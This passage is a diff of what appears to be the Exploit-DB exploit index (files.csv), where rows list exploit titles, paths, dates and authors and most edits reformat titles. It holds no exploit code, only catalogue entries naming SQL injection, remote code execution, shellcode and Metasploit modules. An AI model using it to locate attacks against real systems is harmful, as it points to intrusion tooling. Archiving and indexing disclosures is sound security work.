37781,platforms/php/webapps/37781.txt,"ExtCalendar 2.0 - Multiple SQL Injection and HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps,0 -37782,platforms/php/webapps/37782.txt,"web@all Local File Inclusion and Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps,0 +37782,platforms/php/webapps/37782.txt,"web@all Local File Inclusion and Multiple - Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps,0 37783,platforms/linux/dos/37783.c,"GNU glibc 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0 37784,platforms/php/webapps/37784.txt,"Pinterestclones Security Bypass and HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite Multiple SQL Injection",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 @@ -34149,7 +34149,7 @@ id,file,description,date,author,platform,type,port 37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 Post Auth RCE",2015-08-18,Ebrietas0,php,webapps,80 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,Metasploit,win_x86,remote,8443 37813,platforms/windows/local/37813.rb,"VideoCharge Studio Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0 -37814,platforms/python/remote/37814.rb,"Werkzeug Debug Shell Command Execution",2015-08-18,Metasploit,python,remote,0 +37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution",2015-08-18,Metasploit,python,remote,0 37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS",2015-08-18,hyp3rlinx,php,webapps,80 37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF",2015-08-18,hyp3rlinx,php,webapps,80 37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80 @@ -34171,7 +34171,7 @@ id,file,description,date,author,platform,type,port 37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'SearchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 -37839,platforms/linux/dos/37839.txt,"Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0 +37839,platforms/linux/dos/37839.txt,"Flash PCRE Regex Compilation Zero-Length Assertion - Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0 37840,platforms/windows/remote/37840.txt,"Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0 37841,platforms/windows/remote/37841.txt,"Flash Broker-Based Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0 37842,platforms/windows/remote/37842.txt,"Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,windows,remote,0 @@ -34219,7 +34219,7 @@ id,file,description,date,author,platform,type,port 37884,platforms/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,windows,dos,0 37885,platforms/php/webapps/37885.html,"up.time 7.5.0 Superadmin Privilege Escalation Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999 -37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 +37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37889,platforms/linux/remote/37889.txt,"YingZhiPython - Directory Traversal / Arbitrary File Upload",2012-09-26,"Larry Cashdollar",linux,remote,0 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 @@ -34237,25 +34237,25 @@ id,file,description,date,author,platform,type,port 37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 37903,platforms/php/webapps/37903.txt,"Zenphoto - 'admin-news-articles.php' Cross-Site Scripting",2012-10-02,"Scott Herbert",php,webapps,0 37904,platforms/php/webapps/37904.txt,"Omnistar Mailer Multiple SQL Injection and HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0 -37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for ActiveX Denial of Service",2012-09-28,catatonicprime,windows,dos,0 +37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for - ActiveX Denial of Service",2012-09-28,catatonicprime,windows,dos,0 37906,platforms/php/webapps/37906.txt,"WordPress Googmonify Plugin 0.8.1 - XSS/CSRF",2015-08-21,"Ehsan Hosseini",php,webapps,80 37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent XSS",2015-08-21,"Chris Kellum",php,webapps,80 37908,platforms/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote DoS PoC",2015-08-21,"Shankar Damodaran",windows,dos,21 -37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0 +37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 - wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0 37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion - MS15-081",2015-08-21,"Google Security Research",windows,dos,0 37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write - MS15-080",2015-08-21,"Google Security Research",windows,dos,0 37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free - MS15-081",2015-08-21,"Google Security Research",windows,dos,0 37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free - MS15-081",2015-08-21,"Google Security Research",windows,dos,0 37914,platforms/windows/dos/37914.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0 37915,platforms/windows/dos/37915.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 -37917,platforms/windows/dos/37917.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to - Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37917,platforms/windows/dos/37917.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to - Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 37918,platforms/windows/dos/37918.txt,"Windows win32k.sys TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 37919,platforms/windows/dos/37919.txt,"Windows win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 -37920,platforms/windows/dos/37920.txt,"Windows ATMFD.DLL Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 -37921,platforms/windows/dos/37921.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 +37920,platforms/windows/dos/37920.txt,"Windows ATMFD.DLL Write to Uninitialized Address Due to - Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37921,platforms/windows/dos/37921.txt,"Windows - ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37923,platforms/windows/dos/37923.txt,"Windows ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 +37923,platforms/windows/dos/37923.txt,"Windows - ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow - MS15-081",2015-08-21,"Google Security Research",windows,dos,0 37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0 37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 @@ -34274,7 +34274,7 @@ id,file,description,date,author,platform,type,port 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - CSRF Add Admin Exploit",2015-08-24,"Arash Khazaei",php,webapps,80 37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,Un_N0n,windows,dos,0 -37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,Metasploit,multiple,remote,0 +37958,platforms/multiple/remote/37958.rb,"Firefox - PDF.js Privileged Javascript Injection",2015-08-24,Metasploit,multiple,remote,0 37959,platforms/php/webapps/37959.txt,"BSW Gallery - 'uploadpic.php' Arbitrary File Upload",2012-10-18,"cr4wl3r ",php,webapps,0 37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0 37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0 @@ -34403,7 +34403,7 @@ id,file,description,date,author,platform,type,port 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 38136,platforms/osx/local/38136.txt,"OS X Install.framework - suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 -38137,platforms/osx/local/38137.txt,"OS X Install.framework Arbitrary mkdir_ unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0 +38137,platforms/osx/local/38137.txt,"OS X Install.framework - Arbitrary mkdir_ unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,Metasploit,linux,remote,10443 @@ -34439,7 +34439,7 @@ id,file,description,date,author,platform,type,port 38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38138,platforms/osx/local/38138.txt,"OS X Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 -38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition Remote Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 +38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition Remote - Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 38141,platforms/php/webapps/38141.txt,"Hero Framework search q Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0 38142,platforms/php/webapps/38142.txt,"Hero Framework users/login username Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0 38143,platforms/php/webapps/38143.txt,"cPanel - 'account' Parameter Cross-Site Scripting",2012-12-24,"Rafay Baloch",php,webapps,0 @@ -34449,7 +34449,7 @@ id,file,description,date,author,platform,type,port 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0 38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80 38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console Directory Traversal",2013-01-09,"Dhruv Shah",linux,remote,0 -38204,platforms/php/webapps/38204.txt,"Prizm Content Connect Arbitrary File Upload",2013-01-09,"Include Security Research",php,webapps,0 +38204,platforms/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",php,webapps,0 38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0 38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0 @@ -34461,13 +34461,13 @@ id,file,description,date,author,platform,type,port 38158,platforms/php/webapps/38158.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 38159,platforms/php/webapps/38159.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 38160,platforms/php/webapps/38160.txt,"WordPress Shopping Cart Plugin for WordPress /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38161,platforms/php/webapps/38161.txt,"osTicket l.php url Parameter Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 +38161,platforms/php/webapps/38161.txt,"osTicket l.php url Parameter - Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 38162,platforms/php/webapps/38162.txt,"osTicket tickets.php status Parameter XSS",2013-01-02,AkaStep,php,webapps,0 -38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 +38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0 38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 -38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 +38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 38170,platforms/android/remote/38170.txt,"Facebook for Android 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 @@ -34492,8 +34492,8 @@ id,file,description,date,author,platform,type,port 38191,platforms/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple XSS Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80 38192,platforms/jsp/webapps/38192.txt,"Openfire 3.10.2 - CSRF",2015-09-15,hyp3rlinx,jsp,webapps,80 38194,platforms/android/shellcode/38194.c,"Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 -38195,platforms/windows/remote/38195.rb,"MS15-100 Microsoft Windows Media Center MCL",2015-09-15,Metasploit,windows,remote,0 -38196,platforms/php/remote/38196.rb,"CMS Bolt File Upload",2015-09-15,Metasploit,php,remote,80 +38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL (MS15-100)",2015-09-15,Metasploit,windows,remote,0 +38196,platforms/php/remote/38196.rb,"CMS Bolt - File Upload",2015-09-15,Metasploit,php,remote,80 38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80 38198,platforms/windows/local/38198.txt,"Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38199,platforms/windows/local/38199.txt,"Windows NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0 @@ -34547,7 +34547,7 @@ id,file,description,date,author,platform,type,port 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 -38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 +38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post Auth CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash POC",2015-09-22,VIKRAMADITYA,windows,dos,0 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 @@ -34618,7 +34618,7 @@ id,file,description,date,author,platform,type,port 38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps,0 38328,platforms/php/webapps/38328.txt,"OpenEMR - 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting",2013-02-20,MustLive,php,webapps,0 -38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 +38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer Multiple DLL Loading - Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 38332,platforms/php/webapps/38332.txt,"Batavi - 'index.php' Cross-Site Scripting",2013-03-01,Dognaedis,php,webapps,0 38333,platforms/php/webapps/38333.txt,"phpMyRecipes Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0 @@ -34634,8 +34634,8 @@ id,file,description,date,author,platform,type,port 38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0 38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate Javascript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 -38346,platforms/bsd/remote/38346.rb,"Watchguard XCS Remote Command Execution",2015-09-28,Metasploit,bsd,remote,443 -38347,platforms/bsd/local/38347.rb,"Watchguard XCS FixCorruptMail Local Privilege Escalation",2015-09-28,Metasploit,bsd,local,443 +38346,platforms/bsd/remote/38346.rb,"Watchguard XCS - Remote Command Execution",2015-09-28,Metasploit,bsd,remote,443 +38347,platforms/bsd/local/38347.rb,"Watchguard XCS - FixCorruptMail Local Privilege Escalation",2015-09-28,Metasploit,bsd,local,443 38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector. Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 38349,platforms/windows/local/38349.py,"IconLover 5.42 - Local Buffer Overflow Exploit",2015-09-29,cor3sm4sh3r,windows,local,0 38350,platforms/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421_ 04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps,0 @@ -34649,7 +34649,7 @@ id,file,description,date,author,platform,type,port 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0 -38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,Metasploit,multiple,remote,0 +38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel - Remote Code Execution",2015-10-05,Metasploit,multiple,remote,0 38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,Metasploit,windows,remote,0 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0 38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Inclusion",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0 @@ -34661,7 +34661,7 @@ id,file,description,date,author,platform,type,port 38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 -38372,platforms/php/webapps/38372.html,"Question2Answer Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0 +38372,platforms/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0 38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Parameter Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 @@ -34707,7 +34707,7 @@ id,file,description,date,author,platform,type,port 38419,platforms/windows/dos/38419.txt,"SmallFTPD Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 38420,platforms/multiple/dos/38420.txt,"Google Chrome Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos,0 -38422,platforms/linux/dos/38422.txt,"Apache Subversion Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos,0 +38422,platforms/linux/dos/38422.txt,"Apache Subversion - Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos,0 38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0 38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 - (came_from) HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps,0 38425,platforms/php/webapps/38425.txt,"PHP Address Book /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 @@ -34748,7 +34748,7 @@ id,file,description,date,author,platform,type,port 38460,platforms/jsp/webapps/38460.txt,"jPlayer - 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",jsp,webapps,0 38461,platforms/java/webapps/38461.txt,"Hero Framework /users/login username Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0 38462,platforms/java/webapps/38462.txt,"Hero Framework /users/forgot_password error Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0 -38463,platforms/multiple/webapps/38463.txt,"Aibolit Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 +38463,platforms/multiple/webapps/38463.txt,"Aibolit - Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0 38465,platforms/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos,0 38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 @@ -34769,17 +34769,17 @@ id,file,description,date,author,platform,type,port 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0 38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 -38489,platforms/php/remote/38489.rb,"Nibbleblog File Upload",2015-10-19,Metasploit,php,remote,0 +38489,platforms/php/remote/38489.rb,"Nibbleblog - File Upload",2015-10-19,Metasploit,php,remote,0 38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML injection and Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 38493,platforms/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,dos,0 38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 -38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 +38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF / Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0 38498,platforms/windows/dos/38498.py,"Elecard MPEG Player - '.m3u' File Buffer Overflow",2013-04-27,metacom,windows,dos,0 -38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script Spoofing",2013-04-27,"Jason Whelan",php,webapps,0 +38499,platforms/php/webapps/38499.html,"PHPValley Micro 